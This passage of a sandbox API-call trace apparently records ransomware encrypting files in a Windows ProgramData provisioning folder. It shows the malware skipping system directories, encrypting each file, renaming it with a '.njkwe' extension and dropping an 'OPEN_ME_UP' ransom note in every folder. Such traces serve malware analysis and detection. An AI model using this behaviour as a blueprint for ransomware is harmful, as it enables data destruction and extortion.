pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Policy.provxml") returned 117 [0075.433] StrStrIW (lpFirst="1__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0075.433] lstrcmpW (lpString1="1__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.434] lstrcmpW (lpString1="1__Power_Policy.provxml", lpString2="taridd") returned -1 [0075.434] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.434] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\1__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.434] GetTickCount () returned 0x1153341 [0075.434] GetTickCount () returned 0x1153341 [0075.434] GetTickCount () returned 0x1153341 [0075.434] GetTickCount () returned 0x1153341 [0075.434] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.434] GetProcessHeap () returned 0xbe0000 [0075.434] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.434] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x905, lpOverlapped=0x0) returned 1 [0075.595] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff6fb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.595] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x905, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x905, lpOverlapped=0x0) returned 1 [0075.595] GetProcessHeap () returned 0xbe0000 [0075.595] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.595] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.595] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.595] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.595] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.595] CloseHandle (hObject=0x43c) returned 1 [0075.596] GetProcessHeap () returned 0xbe0000 [0075.596] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.596] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0075.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\1__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\1__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\1__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.596] GetProcessHeap () returned 0xbe0000 [0075.596] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.596] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5409c262, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5409c262, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5409c262, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x905, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Policy.provxml", cAlternateFileName="1__POW~1.PRO")) returned 0 [0075.597] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0075.597] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 125 [0075.597] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.599] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0075.600] CloseHandle (hObject=0x438) returned 1 [0075.600] GetProcessHeap () returned 0xbe0000 [0075.600] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.600] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5409c262, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5409c262, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5409c262, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x257, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0075.600] lstrcmpiW (lpString1="RunTime.xml", lpString2="Windows") returned -1 [0075.600] lstrcmpiW (lpString1="RunTime.xml", lpString2="$Recycle.bin") returned 1 [0075.600] lstrcmpiW (lpString1="RunTime.xml", lpString2="System Volume Information") returned -1 [0075.600] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files") returned 1 [0075.600] lstrcmpiW (lpString1="RunTime.xml", lpString2="Program Files (x86)") returned 1 [0075.600] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml") returned 97 [0075.600] StrStrIW (lpFirst="RunTime.xml", lpSrch=".njkwe") returned 0x0 [0075.600] lstrcmpW (lpString1="RunTime.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.600] lstrcmpW (lpString1="RunTime.xml", lpString2="taridd") returned -1 [0075.600] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0075.601] GetTickCount () returned 0x11533ed [0075.601] GetTickCount () returned 0x11533ed [0075.601] GetTickCount () returned 0x11533ed [0075.601] GetTickCount () returned 0x11533ed [0075.601] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ef98*, pdwDataLen=0x380f048*=0x2c, dwBufLen=0x80 | out: pbData=0x380ef98*, pdwDataLen=0x380f048*=0x80) returned 1 [0075.601] GetProcessHeap () returned 0xbe0000 [0075.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4e850 [0075.601] ReadFile (in: hFile=0x438, lpBuffer=0xc4e850, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesRead=0x380f04c*=0x257, lpOverlapped=0x0) returned 1 [0075.602] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffffda9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.602] WriteFile (in: hFile=0x438, lpBuffer=0xc4e850*, nNumberOfBytesToWrite=0x257, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc4e850*, lpNumberOfBytesWritten=0x380f04c*=0x257, lpOverlapped=0x0) returned 1 [0075.602] GetProcessHeap () returned 0xbe0000 [0075.602] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4e850 | out: hHeap=0xbe0000) returned 1 [0075.602] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.602] WriteFile (in: hFile=0x438, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f04c*=0x300, lpOverlapped=0x0) returned 1 [0075.603] WriteFile (in: hFile=0x438, lpBuffer=0x380ef98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x380ef98*, lpNumberOfBytesWritten=0x380f04c*=0x80, lpOverlapped=0x0) returned 1 [0075.603] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f04c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f04c*=0x4, lpOverlapped=0x0) returned 1 [0075.603] CloseHandle (hObject=0x438) returned 1 [0075.603] GetProcessHeap () returned 0xbe0000 [0075.603] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.603] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe") returned 117 [0075.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\RunTime.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\runtime.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.604] GetProcessHeap () returned 0xbe0000 [0075.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0075.604] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5409c262, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x5409c262, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x5409c262, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x257, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0075.604] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0075.604] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 117 [0075.604] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\Prov\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\prov\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.605] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0075.606] CloseHandle (hObject=0x434) returned 1 [0075.606] GetProcessHeap () returned 0xbe0000 [0075.606] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.606] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x217b4a1a, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x217b4a1a, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x217b4a1a, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 0 [0075.606] FindClose (in: hFindFile=0xc1a120 | out: hFindFile=0xc1a120) returned 1 [0075.606] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 112 [0075.606] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\provisioning\\{3742e5e8-6d9d-473b-99a6-8ecc0f43548a}\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.607] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0075.608] CloseHandle (hObject=0x430) returned 1 [0075.608] GetProcessHeap () returned 0xbe0000 [0075.608] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0075.649] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", cAlternateFileName="{7A30A~1")) returned 1 [0075.649] lstrcmpiW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="Windows") returned -1 [0075.649] lstrcmpiW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="$Recycle.bin") returned 1 [0075.649] lstrcmpiW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="System Volume Information") returned -1 [0075.649] lstrcmpiW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="Program Files") returned -1 [0075.649] lstrcmpiW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="Program Files (x86)") returned -1 [0075.649] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}") returned 80 [0075.649] lstrcmpW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2=".") returned 1 [0075.649] lstrcmpW (lpString1="{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="..") returned 1 [0075.649] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.649] GetProcessHeap () returned 0xbe0000 [0075.770] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0075.770] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*") returned 82 [0075.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0075.801] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.801] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.801] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.801] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.801] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.801] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\.") returned 82 [0075.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.801] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.801] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.801] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.801] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.801] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.801] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.801] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\..") returned 83 [0075.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.801] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fff1c4, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53fff1c4, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53fff1c4, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x13d8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="")) returned 1 [0075.801] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0075.801] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0075.801] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0075.801] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0075.801] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0075.801] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml") returned 99 [0075.802] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0075.802] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.802] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0075.802] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.802] GetTickCount () returned 0x11534b8 [0075.802] GetTickCount () returned 0x11534b8 [0075.802] GetTickCount () returned 0x11534b8 [0075.802] GetTickCount () returned 0x11534b8 [0075.802] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.802] GetProcessHeap () returned 0xbe0000 [0075.802] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.802] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x13d8, lpOverlapped=0x0) returned 1 [0075.804] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffec28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.804] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x13d8, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x13d8, lpOverlapped=0x0) returned 1 [0075.804] GetProcessHeap () returned 0xbe0000 [0075.804] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.804] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.804] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.805] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.805] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.805] CloseHandle (hObject=0x434) returned 1 [0075.805] GetProcessHeap () returned 0xbe0000 [0075.805] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.805] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0075.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml" (normalized: 